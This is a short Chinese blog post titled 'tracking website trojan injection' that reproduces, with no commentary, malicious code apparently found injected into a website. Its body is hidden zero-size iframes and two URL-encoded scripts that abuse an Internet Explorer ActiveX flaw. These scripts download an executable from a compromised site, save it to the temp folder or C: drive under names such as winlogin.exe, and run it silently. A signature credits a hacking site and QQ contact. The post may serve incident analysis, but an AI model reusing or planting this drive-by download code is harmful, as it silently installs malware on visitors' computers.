网站挂马追踪

<iframe src=" [url]http://www.5study.com/admin-nis/eWebEditor/CSS/index.htm[/url]" name="zhu" width="0" height="0" frameborder="0"></iframe>
<iframe src=" [url]http://www.5study.com/admin-nis/eWebEditor/CSS/Mrniu.htm[/url]" name="zhu" width="0" height="0" frameborder="0"></iframe>

<SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0A    on error resume next%0D%0A    dl %3D %22http%3A%2F%2Fwww%2E5study%2Ecom%2Fadmin%2Dnis%2FeWebEditor%2FCSS%2F000%2Eexe%22%0D%0A    Set df %3D document%2EcreateElement%28%22object%22%29%0D%0A    df%2EsetAttribute %22classid%22%2C %22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A    str%3D%22Microsoft%2EXMLHTTP%22%0D%0A    Set x %3D df%2ECreateObject%28str%2C%22%22%29%0D%0A    a1%3D%22Ado%22%0D%0A    a2%3D%22db%2E%22%0D%0A    a3%3D%22Str%22%0D%0A    a4%3D%22eam%22%0D%0A    str1%3Da1%26a2%26a3%26a4%0D%0A    str5%3Dstr1%0D%0A    set S %3D df%2Ecreateobject%28str5%2C%22%22%29%0D%0A    S%2Etype %3D 1%0D%0A    str6%3D%22GET%22%0D%0A    x%2EOpen str6%2C dl%2C False%0D%0A    x%2ESend%0D%0A    fname1%3D%22winlogin%2Eexe%22%0D%0A    set F %3D df%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A    set tmp %3D F%2EGetSpecialFolder%282%29 %0D%0A    fname1%3D F%2EBuildPath%28tmp%2Cfname1%29%0D%0A    S%2Eopen%0D%0A    S%2Ewrite x%2EresponseBody%0D%0A    S%2Esavetofile fname1%2C2%0D%0A    S%2Eclose%0D%0A    set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A    Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A    %3C%2Fscript%3E%0D%0A    %3Chead%3E%0D%0A    %3Ctitle%3E新世纪网安基地%3C%2Ftitle%3E%0D%0A    %3C%2Fhead%3E%3Cbody%3E%0D%0A%09%3Ccenter%3Ehttp%3A%2F%2Fwww%2E520hack%2Ecom%2F占有者制作%2C联系QQ%3A8338850%2E%3C%2Fcenter%3E%0D%0A    %3C%2Fbody%3E%3C%2Fhtml%3E%0D%0A";document.write(unescape(Words))</SCRIPT>

<SCRIPT>var Words="%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3CMETA http%2Deqiv%3D%22content%2Dtype%22 %0D%0Acontent%3D%22text%2Fhtml%3Bcharset%3Dgb2312%22%3E %0D%0A%3Ctitle%3EServer Bad%3C%2Ftitle%3E %0D%0A%0D%0A%3Cscript LANGUAGE%3D%22Javascript%22%3Edocument%2Ewrite%28unescape%28%22%3Chtml%3E%3Chead%3E%0D%0A%3Cscript language%3D%22Javascript%22%3E%0D%0Afunction do1%28mx%2Cas%2Cp%29%0D%0A%7B%0D%0A%09mx%2ESend%28%29%3B%0D%0A%09as%2EType %3D 1%3B%0D%0A%09as%2EOpen%28%29%3B%0D%0A%09as%2EWrite%28mx%2EresponseBody%29%3B%0D%0A%09as%2ESaveToFile%28p%2C2%29%3B%0D%0A%09as%2EClose%28%29%3B%0D%0A%7D%0D%0Avar a %3D null%3B%0D%0Avar mx%2Cas%2Cp%3B%0D%0Ap %3D %22c%3A%5C%5Cmm%2Eexe%22%0D%0Aa %3D %28document%2EcreateElement%28%22object%22%29%29%3B%0D%0Aa%2EsetAttribute%28%22classid%22%2C%22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%29%3B%0D%0Atry%7Bmx %3D a%2ECreateObject%28%22Microsoft%2EXMLHTTP%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0Aif%28%21mx%29try%7Bmx %3D new ActiveXObject%28%22Microsoft%2EXMLHTTP%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0Atry%7Bas %3D a%2ECreateObject%28%22Adodb%2EStream%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0Aif%28as%29%7B%0D%0A%09mx%2EOpen%28%22GET%22%2C%22http%3A%2F%2Fwww%2E5study%2Ecom%2Fadmin%2Dnis%2FeWebEditor%2FCSS%2Findex%2Ehtm%2F000%2Eexe%22%2C0%29%3B%0D%0A%09do1%28mx%2Cas%2Cp%29%3B%0D%0A%09var r%3B%0D%0A%09try%7Br %3D a%2ECreateObject%28%22Shell%2EApplication%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0A%09if%28r%29%0D%0A%09%7B%0D%0A%09%09r%2EShellExecute%28p%2C%22%22%2C%22%22%2C%22open%22%2C0%29%3B%0D%0A%09%7Delse%0D%0A%09%7B%0D%0A%09%09try%7Br %3D a%2ECreateObject%28%22WScript%2EShell%22%2C%22%22%29%3B%7Dcatch%28e%29%7B%7D%3B%0D%0A%09%09if%28r%29r%2ERun%28p%2C0%29%3B%0D%0A%09%7D%0D%0A%7D%0D%0A%0D%0A%3C%2Fscript%3E%0D%0A%3C%2Fhead%3E%0D%0A%3Cbody%3E%0D%0A%0D%0A%22%29%29%3C%2FSCRIPT%3E%0D%0A%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3C%2FHTML%3E%0D%0A";document.write(unescape(Words))</SCRIPT>

本文出自 “simeon技术专栏” 博客，转载请与作者联系！